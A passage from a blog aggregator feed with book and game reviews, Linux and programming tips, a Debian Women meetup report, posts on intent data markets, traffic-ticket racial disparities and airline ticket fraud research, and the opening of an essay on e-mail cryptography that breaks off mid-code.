Despite the length of this review, there are yet more topics in this book I haven't mentioned, such as movement governance. (As both an advocate for and critic of consensus-based decision-making, Tufekci's example of governance in Occupy Wall Street had me both fascinated and cringing.) This is excellent stuff, full of personal anecdotes and entertaining story-telling backed by thoughtful and structured analysis. If you have felt mystified by the role that protests play in modern politics, I highly recommend reading this.

Rating: 9 out of 10

,

Planet DebianNorbert Preining: Gaming: Lara Croft – Rise of the Tomb Raider: 20 Year Celebration

I have to admit, this is the first time I have played something like this. Somehow, Lara Croft – Rise of the Tomb Raider was on sale, and some of the trailers were so well done that I was tempted into getting this game. And to my surprise, it actually works pretty well on Linux, too – yeah!

So I am a first-time player in this kind of league, and had a hard time getting used to controlling lovely Lara, but it turned out easier than I thought – although I guess a controller instead of mouse and keyboard would be better. One starts out somewhere in the mountains (I probably bought the game because there is so much mountaineering in the parts I have seen till now 😉), trying to evade breaking crevices, jumping from ledge to ledge, getting washed away by avalanches – the full program.

But my favorite thing in the game so far is that Lara always carries an ice ax. Completely understandable on the mountain trips, where she climbs frozen icefalls, hanging cliffs, everything, like a super-pro. Wow, I would like to be such an ice climber! But even in the next mission in Syria, she still has her ice ax with her, very conveniently dangling from her side. How suuuper-cool!

After being washed away by an avalanche, we find Lara back on a trip in Syria, followed and nearly killed by the mysterious Trinity organization. During the Syria operation she needs to learn quite a lot of Greek; unfortunately the player doesn’t have to learn it with her – I could use some polishing of my Ancient Greek.

The game is a first of its kind for me, with long cinematic parts between the playing sections. The switch between cinematics and play is so well done that I sometimes have the feeling I need to control Lara during these times, too. The graphics are also stunning to my eyes, impressive.

I have never played a Lara game or seen a Lara movie, but my first association was to the Die Hard movie series – always the dirty clothes, scratches and dirt-covered body. Lara is no exception here. Last but not least, the deaths of Lara (one – at least I – often dies in these games) are often quite funny and entertaining: spiked in some tombs, smashed to pieces by a falling stone column, etc. I really have to learn it the hard way.

I have only finished two expeditions so far, and have no idea how many more are to come. But it seems like I will continue. The good thing is that there are lots of restart points and permanent saves, so if one dies, or the computer dies, one doesn’t have to redo the whole bunch. Well done.

Planet Linux AustraliaFrancois Marier: Running mythtv-setup over ssh

In order to configure a remote MythTV server, I had to run mythtv-setup remotely over an ssh connection with X forwarding:

ssh -X mythtv@machine

For most config options, I can either use the configuration menus inside of mythfrontend (over a vnc connection) or the Settings section of MythWeb, but some of the backend and tuner settings are only available through the main setup program.

Unfortunately, mythtv-setup won't work over an ssh connection by default and prints the following error in the terminal:

$ mythtv-setup
...
W  OpenGL: Could not determine whether Sync to VBlank is enabled.
Handling Segmentation fault
Segmentation fault (core dumped)

The fix for this was to specify a different theme painter:

mythtv-setup -O ThemePainter=qt

Planet DebianRenata D'Avila: Debian Women in Curitiba

This post is long overdue, but I have been so busy lately that I didn't have the time to sit down and write it in the past few weeks. What have I been busy with? Let's start with this event, which happened back in March:

Debian Women meeting in Curitiba (March 10th, 2018)

The eight women who attended the meeting gathered together in front of a tv with the Debian Women logo

At MiniDebConf Curitiba last year, few women attended. And, as I mentioned on a previous post, there was not even a single women speaking at MiniDebConf last year.

I didn't want MiniDebConf Curitiba 2018 to be a repeat of last year. Why? In part, because I have been involved in other tech communities and I know it doesn't have to be like that (unless, of course, the community insists on being misogynistic...).

So I came up with the idea of having a meeting for women in Curitiba one month before MiniDebConf. The main goal was to create a good environment for women to talk about Debian, whether they had used GNU/Linux before or not, whether they were programmers or not.

Miriam and Kira, two other women from the state of Parana interested in Debian, came along and helped out with planning. We used a collaborative pad to organize the tasks and activities and to create the text for the folder about Debian we had printed (based on Debian's documentation).

For the final version of the folder, it's important to acknowledge the help Luciana gave us, all the way from Minas Gerais. She collaborated with the translations, reviewed the texts and fixed the layout.

A pile with folded Debian Women folders. The writings are in Portuguese and it's possible to see a QR code.

The final odg file, in Portuguese, can be downloaded here: folder_debian_30cm.odg

Very quickly, because we had so little time (we settled on a date and a place a little over one month before the meeting), I created a web page and put it online the only way I could at that moment, using Github Pages. https://debianwomenbr.github.io

We used Mate Hackers' instance of nos.vc to register for the meeting, simply because we had to plan accordingly. This was the address for registration: https://encontros.matehackers.org/pt/projects/60-encontro-debian-women

Through the Training Center, a Brazilian tech community, we got to Lucio, who works at Pipefy and offered us the space so we could hold the meeting. Thank you, Lucio, Training Center and Pipefy!

Pipefy logo

Because Miriam and I weren't in Curitiba, we had to focus the promotion of this meeting online. Not ideal when someone wants to be truly inclusive, but we worked with the resources we had. We reached out to TechLadies and invited them - as we did with many other groups.

This was our schedule:

Morning

09:00 - Welcome coffee

10:00 - What is Free Software? Copyright, licenses, sharing

10:30 - What is Debian?

12:00 - Lunch Break

Afternoon

14:30 - Internships with Debian - Outreachy and Google Summer of Code

15:00 - Install fest / helping with users issues

16:00 - Editing the Debian wiki to register this meeting https://wiki.debian.org/DebianWomen/History

17:30 - Wrap up

Take outs from the meeting:

  • Because we knew more or less how many people would attend, we were able to buy the food accordingly right before the meeting - and ended up spending much less than if we had ordered some kind of catering.

  • Sadly, it would cost almost as much to print a dozen folders as it would to print a hundred of them. So we ended up printing 100 folders (which was expensive enough). The good part is that we would end up handing them out during MiniDebConf Curitiba.

  • We attempted a live stream of the meeting using Jitsi, but I don't think we were very successful, because we didn't have a microphone for the speakers.

  • Most of our audience ended up being women who, in fact, already knew and/or used Debian, but weren't actively involved with the community.

  • It was during this meeting that the need for a mailing list in Portuguese for women interested in Debian came up. Because, yes, in a country where English is taught so poorly in the schools, the language can still be a barrier. We also wanted to keep in touch and share information about the Brazilian community and what we are doing. We want next year's DebConf to have a lot of women, especially Brazilian women who are interested and/or who are users and/or contribute to Debian. The request for this mailing list would be put through by Helen during MiniDebConf, using the bug report system. If you can, please support us: https://bugs.debian.org/cgi-bin/bugreport.cgi?bug=895575

Pictures from the meeting:

The breakfast table with food

Our breakfast table!

Miriam telling the women about Free Software, six women listening

Miriam's talk: What is Free Software? Copyright, licenses, sharing

Renata and Miriam talking about What is Debian; a TV between them shows the title of the talk

Miriam and Renata's talk: What is Debian?

Renata talking about internships with Debian

Renata talking about internships with Debian

Thank you to all the women who participated!

The participants with the two men who helped with the meeting.

And to our lovely staff. Thank you, Lucio, for getting us the space and thank you, Pipefy!

This has been partly documented at Debian Wiki (DebianWomen/History) because the very next day after this meeting, Debian Wiki completely blocked ProtonVPN from even accessing the Wiki. Awesome. If anyone is able to, feel free to copy/paste any of this text there.

Planet DebianRuss Allbery: Review: Deep Work

Review: Deep Work, by Cal Newport

Publisher: Grand Central
Copyright: January 2016
ISBN: 1-4555-8666-8
Format: Kindle
Pages: 287

If you follow popular psychology at all, you are probably aware of the ongoing debate over multitasking, social media, smartphones, and distraction. Usually, and unfortunately, this comes tainted by generational stereotyping: the kids these days who spend too much time with their phones and not enough time getting off their elders' lawns, thus explaining their inability to get steady, high-paying jobs in an economy designed to avoid steady, high-paying jobs. However, there is some real science under the endless anti-millennial think-pieces. Human brains are remarkably bad at multitasking, and it causes significant degradation of performance. Worse, that performance degradation goes unnoticed by the people affected, who continue to think they're performing tasks at their normal proficiency. This comes into harsh conflict with modern workplaces heavy on email and chat systems, and even harsher conflict with open plan offices.

Cal Newport is an associate professor of computer science at Georgetown University with a long-standing side profession of writing self-help books, initially focused on study habits. In this book, he argues that the ability to do deep work — focused, concentrated work that pushes the boundaries of what one understands and is capable of — is a valuable but diminishing skill. If one can develop both the habit and the capability for it (more on that in a moment), it can be extremely rewarding and a way of differentiating oneself from others in the same field.

Deep Work is divided into two halves. The first half is Newport's argument that deep work is something you should consider trying. The second, somewhat longer half is his techniques for getting into and sustaining the focus required.

In making his case for this approach, Newport puts a lot of effort into avoiding broader societal prescriptions, political stances, or even general recommendations and tries to keep his point narrow and focused: the ability to do deep, focused work is valuable and becoming rarer. If you develop that ability, you will have an edge. There's nothing exactly wrong with this, but much of it is obvious and he belabors it longer than he needed to. (That said, I'm probably more familiar with research on concentration and multitasking than some.)

That said, I did like his analysis of busyness as a proxy for productivity in many workplaces. The metrics and communication methods most commonly used in office jobs are great at measuring responsiveness and regular work on shallow tasks in the moment, and bad at measuring progress towards deeper, long-term goals, particularly ones requiring research or innovation. The latter is recognized and rewarded once it finally pays off, but often treated as a mysterious capability some people have and others don't. Meanwhile, the day-to-day working environment is set up to make it nearly impossible, in Newport's analysis, to develop and sustain the habits required to achieve those long-term goals. It's hard to read this passage and not be painfully aware of how much time one spends shallowly processing email, and how that's rewarded in the workplace even though it rarely leads to significant accomplishments.

The heart of this book is the second half, which is where Deep Work starts looking more like a traditional time management book. Newport lays out four large areas of focus to increase one's capacity for deep work: create space to work deeply on a regular basis, embrace boredom, quit social media, and cut shallow work out of your life. Inside those areas, he provides a rich array of techniques, some rather counter-intuitive, that have worked for him. This is in line with traditional time management guidance: focus on a few important things at a time, get better at saying no, put some effort into planning your day and reviewing that plan, and measure what you're trying to improve. But Newport has less of a focus on any specific system and more of a focus on what one should try to cut out of one's life as much as possible to create space for thinking deeply about problems.

Newport's guidance is constructed around the premise (which seems to have some grounding in psychological research) that focused, concentrated work is less a habit that one needs to maintain than a muscle that one needs to develop. His contention is that multitasking and interrupt-driven work isn't just a distraction that can be independently indulged or avoided each day, but instead degrades one's ability to concentrate over time. People who regularly jump between tasks lose the ability to not jump between tasks. If they want to shift to more focused work, they have to regain that ability with regular, mindful practice. So, when Newport says to embrace boredom, it's not just due to the value of quiet and unstructured moments. He argues that reaching for one's phone to scroll through social media in each moment of threatened boredom undermines one's ability to focus in other areas of life.

I'm not sure I'm as convinced as Newport is, but I've been watching my own behavior closely since I read this book and I think there's some truth here. I picked this book up because I've been feeling vaguely dissatisfied with my ability to apply concentrated attention to larger projects, and because I have a tendency to return to a comfort zone of unchallenging tasks that I already know how to do. Newport would connect that to a job with an open plan office, a very interrupt-driven communications culture, and my personal habits, outside of work hours, of multitasking between TV, on-line chat, and some project I'm working on.

I'm not particularly happy about that diagnosis. I don't like being bored, I greatly appreciate the ability to pull out my phone and occupy my mind while I'm waiting in line, and I have several very enjoyable hobbies that only take "half a brain," which I neither want to devote time to exclusively nor want to stop doing entirely. But it's hard to argue with the feeling that my brain skitters away from concentrating on one thing for extended periods of time, and it does feel like an underexercised muscle.

Some of Newport's approach seems clearly correct: block out time in your schedule for uninterrupted work, find places to work that minimize distractions, and batch things like email and work chat instead of letting yourself be constantly interrupted by them. I've already noticed how dramatically more productive I am when working from home than working in an open plan office, even though the office doesn't bother me in the moment. The problems with an open plan office are real, and the benefits seem largely imaginary. (Newport dismantles the myth of open office creativity and contrasts it with famously creative workplaces like MIT and Bell Labs that used a hub and spoke model, where people would encounter each other to exchange ideas and then retreat into quiet and isolated spaces to do actual work.) And Newport's critique of social media seemed on point to me: it's not that it offers no benefits, but it is carefully designed to attract time and attention entirely out of proportion to the benefits that it offers, because that's the business model of social media companies.

Like any time management book, some of his other advice is less convincing. He makes a strong enough argument for blocking out every hour of your day (and then revising the schedule repeatedly through the day as needed) that I want to try it again, but I've attempted that in the past and it didn't go well at all. I'm similarly dubious of my ability to think through a problem while walking, since most of the problems I work on rely on the ability to do research, take notes, or start writing code while I work through the problem. But Newport presents all of this as examples drawn from his personal habits, and cares less about presenting a system than about convincing the reader that it's both valuable and possible to carve out thinking space for oneself and improve one's capacity for sustained concentration.

This book is explicitly focused on people with office jobs who are rewarded for tackling somewhat open-ended problems and finding creative solutions. It may not resonate with people in other lines of work, particularly people whose jobs are the interrupts (customer service jobs, for example). But its target profile fits me and a lot of others in the tech industry. If you're in that group, I think you'll find this thought-provoking.

Recommended, particularly if you're feeling harried, have the itch to do something deeper or more interesting, and feel like you're being constantly pulled away by minutia.

You can get a sample of Newport's writing in his Study Habits blog, although be warned that some of the current moral panic about excessive smartphone and social media use creeps into his writing there. (He's currently working on a book on digital minimalism, so if you're allergic to people who have caught the minimalism bug, his blog will be more irritating than this book.) I appreciated him keeping the moral panic out of this book and instead focusing on more concrete and measurable benefits.

Rating: 8 out of 10

Sky CroeserMothering

Today I am thinking about mothering as a way in which we can make the world (in all its messiness and difficulty) better.

“Children are the ways that the world begins again and again. If you fasten upon that concept of their promise, you will have trouble finding anything more awesome, and also anything more extraordinarily exhilarating, than the opportunity or/and the obligation to nurture a child into his or her own freedom.” – June Jordan

Mothering is often treated by our society as an inherently conservative activity, something that’s about preserving the past (past traditions, past family structures, past values). But I’m learning from so many people (including people who aren’t biological mothers) who are knitting together strands from the past and hopes for the future.

Care for nature, for the world around us, for our mothers’ and grandmothers’ knowledge and experience. And dreams of more space for children to be who they want to be, to welcome and nurture others, to grow freely.

My mother and grandmother taught me so much, and still do. They are kind and fierce and have managed change and dislocation while always providing me with a steady point in the world.

My beautiful friends who are mothers teach me every day through their examples and their honesty about the difficult moments as well as the wonderful ones.

And I learn from mothers beyond my little circles, too.

From Noongar mothers, and other Aboriginal mothers who fought for recognition of the kidnapping of their children, and who are working today to build a society where their children will be safe and valued as they should be.

From Black mothers like June Jordan, Alexis Pauline Gumbs, and others in the ‘Revolutionary Mothering’ collection, which I return to again and again. They have done so much to help me understand other mothers’ experiences, and to see the possibilities and work that I should be taking up. And others, like Sylvia Federici, who have helped me see what I might not have, otherwise.

From mothers who must be brave enough to leave war or economic insecurity, hoping for safety, even though it also means leaving behind family and friends and home and the language and culture that has been held dear.

From mothers who work quietly and consistently and without recognition, from mothers who are sometimes difficult because of the work they do, from mothers who struggle with their own pasts, and who nevertheless keep trying to create the world anew, more full of love and possibility than before.

,

Planet Linux AustraliaMichael Still: Head On

A sequel to Lock In, this book is a quick and fun read of a murder mystery. It has Scalzi’s distinctive style, which has generally meshed quite well for me, so it’s no surprise that I enjoyed this book.

Head On
Author: John Scalzi
Genre: Fiction
Publisher: Tor Books
Published: April 19, 2018
Pages: 336

To some left with nothing, winning becomes everything In a post-virus world, a daring sport is taking the US by storm. It's frenetic, violent and involves teams attacking one another with swords and hammers. The aim: to obtain your opponent's head and carry it through the goalposts. Impossible? Not if the players have Hayden's Syndrome. Unable to move, Hayden's sufferers use robot bodies, which they operate mentally. So in this sport anything goes, no one gets hurt - and crowds and competitors love it. Until a star athlete drops dead on the playing field. But is it an accident? FBI agents Chris Shane and Leslie Vann are determined to find out. In this game, fortunes can be made - or lost. And both players and owners will do whatever it takes to win, on and off the field.John Scalzi returns with Head On, a chilling near-future SF with the thrills of a gritty cop procedural. Head On brings Scalzi's trademark snappy dialogue and technological speculation to the future world of sports.

Don MartiCan markets for intent data even be a thing?

Doc Searls is optimistic that surveillance marketing is going away, but what's going to replace it? One idea that keeps coming up is the suggestion that prospective buyers should be able to sell purchase intent data to vendors directly. This seems to be appealing because it means that the Marketing department will still get to have Big Data and stuff, but I'm still trying to figure out how voluntary transactions in intent data could even be a thing.

Here's an example. It's the week before Thanksgiving, and I'm shopping for a kitchen stove. Here are two possible pieces of intent information that I could sell.

  • "I'm cutting through the store on the way to buy something else. If a stove is on sale, I might buy it, but only if it's a bargain, because who needs the hassle of handling a stove delivery the week before Thanksgiving?"

  • "My old stove is shot, and I need one right away because I have already invited people over. Shut up and take my money."

On a future intent trading platform, what's my incentive to reveal which intent is the true one?

If I'm a bargain hunter, I'm willing to sell my intent information, because it would tend to get me a lower price. But in that case, why would any store want to buy the information?

If I need the product now, I would only sell the information for a price higher than the expected difference between the price I would pay and the price a bargain hunter would pay. But if the information isn't worth more than the price difference, why would the store want to buy it?
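
Put crude numbers on it (these figures are invented purely for illustration) and the incentive mismatch is easy to see:

#include <iostream>

int main()
{
    // Invented example: what the store could charge each kind of buyer for a stove.
    double bargain_price = 400.0;  // price a visible bargain hunter would pay
    double urgent_price  = 500.0;  // price a visibly urgent buyer would pay

    // The most the store would pay for "this buyer is urgent" is the extra
    // margin that knowledge lets it capture.
    double store_max_offer = urgent_price - bargain_price;

    // The least the urgent buyer would accept is the price increase that
    // revealing the intent costs them.
    double buyer_min_ask = urgent_price - bargain_price;

    std::cout << "store will pay at most:     " << store_max_offer << "\n"
              << "buyer will accept at least: " << buyer_min_ask << "\n"
              << "room for a voluntary trade: "
              << (store_max_offer > buyer_min_ask ? "yes" : "no") << "\n";
}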

So how can a market for purchase intent data happen?

Or is the idea of selling access to purchase intent only feasible if the intent data is taken from the "data subject" without permission?

Anyway, I can see how search advertising and signal-based advertising can assume a more important role as surveillance marketing becomes less important, but I'm not sure about markets for purchase intent. Maybe user data sharing will be not so much a stand-alone thing as a role for trustworthy news and cultural sites, as people choose to share data as part of commenting and survey completion, and that data, in aggregated form, becomes part of a site's audience profile.

Planet DebianRuss Allbery: Review: Always Human

Review: Always Human, by walkingnorth

Publisher: LINE WEBTOON
Copyright: 2015-2017
Format: Online graphic novel
Pages: 336
Always Human is a graphic novel published on the LINE WEBTOON platform. It was originally published in weekly updates and is now complete in two "seasons." It is readable for free, starting with episode one. The pages metadata in the sidebar is therefore a bit of a lie: it's my guess on how many pages this would be if it were published as a traditional graphic novel (four times the number of episodes), provided as a rough guide of how long it might take to read (and because I have a bunch of annual reading metadata that I base on page count, even if I have to make up the concept of pages).

Always Human is set in a 24th century world in which body modifications for medical, cosmetic, and entertainment purposes are ubiquitous. What this story refers to as "mods" are nanobots that encompass everything from hair and skin color changes through protection from radiation to allow interplanetary travel to anti-cancer treatments. Most of them can be trivially applied with no discomfort, and they've largely taken over the fashion industry (and just about everything else). The people of this world spend as little time thinking about their underlying mechanics as we spend thinking about synthetic fabrics.

This is why Sunati is so struck by the young woman she sees at the train station. Sunati first noticed her four months ago, and she's not changed anything about herself since: not her hair, her eye color, her skin color, or any of the other things Sunati (and nearly everyone else) change regularly. To Sunati, it's a striking image of self-confidence and increases her desire to find an excuse to say hello. When the mystery woman sneezes one day, she sees her opportunity: offer her a hay-fever mod that she carries with her!

Alas for Sunati's initial approach, Austen isn't simply brave or quirky. She has Egan's Syndrome, an auto-immune problem that makes it impossible to use mods. Sunati wasn't expecting her kind offer to be met with frustrated tears. In typical Sunati form, she spends a bunch of time trying to understand what happened, overthinking it, hoping to see Austen again, and freezing when she does. Lucky for Sunati, typical Austen form is to approach her directly and apologize, leading to an explanatory conversation and a trial date.

Always Human is Sunati and Austen's story: their gentle and occasionally bumbling romance, Sunati's indecisiveness and tendency to talk herself out of communicating, and Austen's determined, relentless, and occasionally sharp-edged insistence on defining herself. It's not the sort of story that has wars, murder mysteries, or grand conspiracies; the external plot drivers are more mundane concerns like choice of majors, meeting your girlfriend's parents, and complicated job offers. It's also, delightfully, not the sort of story that creates dramatic tension by occasionally turning the characters into blithering idiots.

Sunati and Austen are by no means perfect. Both of them do hurt each other without intending to, both of them have blind spots, and both of them occasionally struggle with making emergencies out of things that don't need to be emergencies. But once those problems surface, they deal with them with love and care and some surprisingly good advice. My first reading was nervous. I wasn't sure I could trust walkingnorth not to do something stupid to the relationship for drama; that's so common in fiction. I can reassure you that this is a place where you can trust the author.

This is also a story about disability, and there I don't have the background to provide the same reassurance with much confidence. However, at least from my perspective, Always Human reliably treats Austen as a person first, weaves her disability into her choices and beliefs without making it the cause of everything in her life, and tackles head-on some of the complexities of social perception of disabilities and the bad tendency to turn people into Inspirational Disabled Role Model. It felt to me like it struck a good balance.

This is also a society that's far more open about human diversity in romantic relationships, although there I think it says more about where we currently are as a society than what the 24th century will "actually" be like. The lesbian relationship at the heart of the story goes essentially unremarked; we're now at a place where that can happen without making it a plot element, at least for authors and audiences below a certain age range. The (absolutely wonderful) asexual and non-binary characters in the supporting cast, and the one polyamorous relationship, are treated with thoughtful care, but still have to be remarked on by the characters.

I think this says less about walkingnorth as a writer than it does about managing the expectations of the reader. Those ideas are still unfamiliar enough that, unless the author is very skilled, they have to choose between dragging the viciousness of current politics into the story (which would be massively out of place here) or approaching the topic with an earnestness that feels a bit like an after-school special. walkingnorth does the latter and errs on the side of being a little too didactic, but does it with a gentle sense of openness that fits the quiet and supportive mood of the whole story. It feels like a necessary phase that we have to go through between no representation at all and the possibility of unremarked representation, which we're approaching for gay and lesbian relationships.

You can tell from this review that I mostly care about the story rather than the art (and am not much of an art reviewer), but this is a graphic novel, so I'll try to say a few things about it. The art seemed clearly anime- or manga-inspired to me: large eyes as the default, use of manga conventions for some facial expressions, and occasional nods towards a chibi style for particularly emotional scenes. The color palette has a lot of soft pastels that fit the emotionally gentle and careful mood. The focus is on human figures and shows a lot of subtlety of facial expressions, but you won't get as much in the way of awe-inspiring 24th century backgrounds. For the story that walkingnorth is telling, the art worked extremely well for me.

The author also composed music for each episode. I'm not reviewing it because, to be honest, I didn't enable it. Reading, even graphic novels, isn't that sort of multimedia experience for me. If, however, you like that sort of thing, I have been told by several other people that it's quite good and fits the mood of the story.

That brings up another caution: technology. A nice thing about books, and to a lesser extent traditionally-published graphic novels, is that whether you can read it doesn't depend on your technological choices. This is a web publishing platform, and while apparently it's a good one that offers some nice benefits for the author (and the author is paid for their work directly), it relies on a bunch of JavaScript magic (as one might expect from the soundtrack). I had to fiddle with uMatrix to get it to work and still occasionally saw confusing delays in the background loading some of the images that make up an episode. People with more persnickety ad and JavaScript blockers have reported having trouble getting it to display at all. And, of course, one has to hope that the company won't lose interest or go out of business, causing Always Human to disappear. I'd love to buy a graphic novel on regular paper at some point in the future, although given the importance of the soundtrack to the author (and possible contracts with the web publishing company), I don't know if that will be possible.

This is a quiet, slow, and reassuring story full of gentle and honest people who are trying to be nice to each other while navigating all the tiny conflicts that still arise in life. It wasn't something I was looking for or even knew I would enjoy, and turned out to be exactly what I wanted to read when I found it. I devoured it over the course of a couple of days, and am now eagerly awaiting the author's next work (Aerial Magic). It is unapologetically cute and adorable, but that covers a solid backbone of real relationship insight. Highly recommended; it's one of the best things I've read this year.

Many thanks to James Nicoll for writing a review of this and drawing it to my attention.

Rating: 9 out of 10

Planet DebianNorbert Preining: MySql DateTime/TimeStamp fields and Scala

In one of my work projects we use Play Framework on Scala to provide an API (how surprising ;-). For quite some time I was hunting for lost milliseconds: the API's answers were terribly late compared to hammering directly at the MySql server. It turned out to be a problem of the interaction between the MySql DateTime format and Scala.

It sounded like too nice an idea to save our traffic data in a MySql database with the timestamp stored in a DateTime or Timestamp column. The display in MySql Workbench looks nice and is easily readable. But somehow our API server's response was horribly slow, especially when there were several requests. Hours and hours of tuning the SQL code, trying to turn off sorting, adding extra indices, none of it to any avail.

The solution was rather trivial: the actual time was lost not in the SQL part, nor in the processing in our Scala code, but in the conversion from MySql DateTime/Timestamp objects to Scala/Java Timestamps. We are using ActiveRecord for Scala, a very nice and convenient library, which converts MySql DateTime/Timestamps to Scala/Java Timestamps. But this conversion seems, especially for a large number of entries, to become rather slow. With months of traffic data and hundreds of thousands of timestamps to convert, the API collapsed to unacceptable response times.

Converting the whole pipeline (from data producer to database and API) to use a plain simple Long boosted the API performance considerably. Lesson learned: don't use MySql DateTime/Timestamp if you need lots of conversions.

,

CryptogramFriday Squid Blogging: How the Squid Lost Its Shell

Squids used to have shells.

As usual, you can also use this squid post to talk about the security stories in the news that I haven't covered.

Read my blog posting guidelines here.

Sociological ImagesWho Gets a Ticket?

The recent controversial arrests at a Philadelphia Starbucks, where a manager called the police on two Black men who had only been in the store a few minutes, are an important reminder that bias in the American criminal justice system creates both large scale, dramatic disparities and little, everyday inequalities. Research shows that common misdemeanors are a big part of this, because fines and fees can pile up on people who are more likely to be policed for small infractions.

A great example is the common traffic ticket. Some drivers who get pulled over get a ticket, while others get let off with a warning. Does that discretion shake out differently depending on the driver’s race? The Stanford Open Policing Project has collected data on over 60 million traffic stops, and a working paper from the project finds that Black and Hispanic drivers are more likely to be ticketed or searched at a stop than white drivers.

To see some of these patterns in a quick exercise, we pulled the project’s data on over four million stop records from Illinois and over eight million records from South Carolina. These charts are only a first look—we split the recorded outcomes of stops across the different codes for driver race available in the data and didn’t control for additional factors. However, they give a troubling basic picture about who gets a ticket and who drives away with a warning.

(Charts: traffic stop outcomes by driver race in Illinois and South Carolina; click through to the original post for full-size versions.)

These charts show more dramatic disparities in South Carolina, but a larger proportion of white drivers who were stopped got off with warnings (and fewer got tickets) in Illinois as well. In fact, with millions of observations in each data set, differences of even a few percentage points can represent hundreds, even thousands of drivers. Think about how much revenue those tickets bring in, and who has to pay them. In the criminal justice system, the little things can add up quickly.

(View original at https://thesocietypages.org/socimages)

Planet DebianSune Vuorela: Modern C++ and Qt – part 2.

I recently did a short tongue-in-cheek blog post about Qt and modern C++. In the comments, people discovered that several compilers effectively can optimize std::make_unique<>().release() to a simple new statement, which was kind of a surprise to me.

I have recently written a new program from scratch (more about that later), and I tried to force myself to use standard library smart pointers much more than I normally have been doing.

I ended up trying to apply a set of rules for memory handling to my code base to try to see where it could end.

  • No naked delete‘s
  • No new statements, unless it was handed directly to a Qt function taking ownership of the pointer. (To avoid silliness like the previous one)
  • Raw pointers in the code are observer pointers. We can do this in new code, but in older code it is hard to argue that.

It resulted in code like

m_document = std::make_unique<QTextDocument>();
auto layout = std::make_unique<QHBoxLayout>();
auto textView = std::make_unique<QTextBrowser>();
textView->setReadOnly(true);
textView->setDocument(m_document.get());
layout->addWidget(textView.release());
setLayout(layout.release());

By itself, it is quite OK to work with, and we get all ownership transfers documented. So maybe we should start coding this way.

But there is also a hole in the ownership pass-around, though given that Qt methods don't throw, it shouldn't be much of a problem.

More about my new fancy / boring application at a later point.

I still haven’t fully embraced the C++17 thingies. My mental baseline is kind of the compiler in Debian Stable.

CryptogramAirline Ticket Fraud

New research: "Leaving on a jet plane: the trade in fraudulently obtained airline tickets:"

Abstract: Every day, hundreds of people fly on airline tickets that have been obtained fraudulently. This crime script analysis provides an overview of the trade in these tickets, drawing on interviews with industry and law enforcement, and an analysis of an online blackmarket. Tickets are purchased by complicit travellers or resellers from the online blackmarket. Victim travellers obtain tickets from fake travel agencies or malicious insiders. Compromised credit cards used to be the main method to purchase tickets illegitimately. However, as fraud detection systems improved, offenders displaced to other methods, including compromised loyalty point accounts, phishing, and compromised business accounts. In addition to complicit and victim travellers, fraudulently obtained tickets are used for transporting mules, and for trafficking and smuggling. This research details current prevention approaches, and identifies additional interventions, aimed at the act, the actor, and the marketplace.

Blog post.

Planet DebianDaniel Kahn Gillmor: E-mail Cryptography

I've been working on cryptographic e-mail software for many years now, and i want to set down some of my observations of what i think some of the challenges are. I'm involved in Autocrypt, which is making great strides in sensible key management (see the last section below, which is short not because i think it's easy, but because i think Autocrypt has covered this area quite well), but there are additional nuances to the mechanics and user experience of e-mail encryption that i need to get off my chest.

Feedback welcome!

Cryptography and E-mail Messages

Cryptographic protection (i.e., digital signatures, encryption) of e-mail messages has a complex history. There are several different ways that various parts of an e-mail message can be protected (or not), and those mechanisms can be combined in a huge number of ways.

In contrast to the technical complexity, users of e-mail tend to expect a fairly straightforward experience. They also have little to no expectation of explicit cryptographic protections for their messages, whether for authenticity, for confidentiality, or for integrity.

If we want to change this -- if we want users to be able to rely on cryptographic protections for some e-mail messages in their existing e-mail accounts -- we need to be able to explain those protections without getting in the user's way.

Why expose cryptographic protections to the user at all?

For a new messaging service, the service itself can simply enumerate the set of properties that all messages exchanged through the service must have, design the system to bundle those properties with message deliverability, and then users don't need to see any of the details for any given message. The presence of the message in that messaging service is enough to communicate its security properties to the extent that the users care about those properties.

However, e-mail is a widely deployed, heterogeneous, legacy system, and even the most sophisticated users will always interact with some messages that lack cryptographic protections.

So if we think those protections are meaningful, and we want users to be able to respond to a protected message at all differently from how they respond to an unprotected message (or if they want to know whether the message they're sending will be protected, so they can decide how much to reveal in it), we're faced with the challenge of explaining those protections to users at some level.

Simplicity

The best level at which to display cryptographic protections for a typical e-mail user is on a per-message basis.

Wider than per-message (e.g., describing protections on a per-correspondent or a per-thread basis) is likely to stumble on mixed statuses, particularly when other users switch e-mail clients that don't provide the same cryptographic protections, or when people are added to or removed from a thread.

Narrower than per-message (e.g., describing protections on a per-MIME-part basis, or even within a MIME part) is too confusing: most users do not understand the structure of an e-mail message at a technical level, and are unlikely to be able to (or want to) spend any time learning about it. And a message with some cryptographic protection and other tamperable user-facing parts is a tempting vector for attack.

So at most, an e-mail should have one cryptographic state that covers the entire message.

At most, the user probably wants to know:

  • Is the content of this message known only to me and the sender (and the other people in Cc)? (Confidentiality)

  • Did this message come from the person I think it came from, as they wrote it? (Integrity and Authenticity)

Any more detail than this is potentially confusing or distracting.

Combinations

Is it possible to combine the two aspects described above into something even simpler? That would be nice, because it would allow us to categorize a message as either "protected" or "not protected". But there are four possible combinations:

  • unsigned cleartext messages: these are clearly "not protected"

  • signed encrypted messages: these are clearly "protected" (though see further sections below for more troubling caveats)

  • signed cleartext messages: these are useful in cases where confidentiality is irrelevant -- posts to a publicly-archived mailing list, for example, or announcement e-mails about a new version of some piece of software. It's hard to see how we can get away with ignoring this category.

  • unsigned encrypted messages: There are people who send encrypted messages who don't want to sign those messages, for a number of reasons (e.g., concern over the reuse/misuse of their signing key, and wanting to be able to send anonymous messages). Whether you think those reasons are valid or not, some signed messages cannot be validated. For example:

    • the signature was made improperly,
    • the signature was made with an unknown key,
    • the signature was made using an algorithm the message recipient doesn't know how to interpret
    • the signature was made with a key that the recipient believes is broken/bad

    We have to handle receipt of signed+encrypted messages with any of these signature failures, so we should probably deal with unsigned encrypted messages in the same way.

My conclusion is that we need to be able to represent these states separately to the user (or at least to the MUA, so it can plan sensible actions), even though i would prefer a simpler representation.

Note that some other message encryption schemes (such as those based on shared symmetric keying material, where message signatures are not used for authenticity) may not actually need these distinctions, and can therefore get away with the simpler "protected/not protected" message state. I am unaware of any such scheme being used for e-mail today.
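To make the conclusion above concrete, here is one purely illustrative way an MUA might track the two properties separately; the names are made up for this sketch and are not drawn from any existing client.

# Illustrative sketch: confidentiality and integrity/authenticity as
# separate per-message properties, as argued above.
from dataclasses import dataclass
from enum import Enum

class Signature(Enum):
    NONE = "unsigned"    # no signature, or one we treat as absent (broken, unknown key, ...)
    VALID = "signed"     # a whole-message signature that verified

@dataclass
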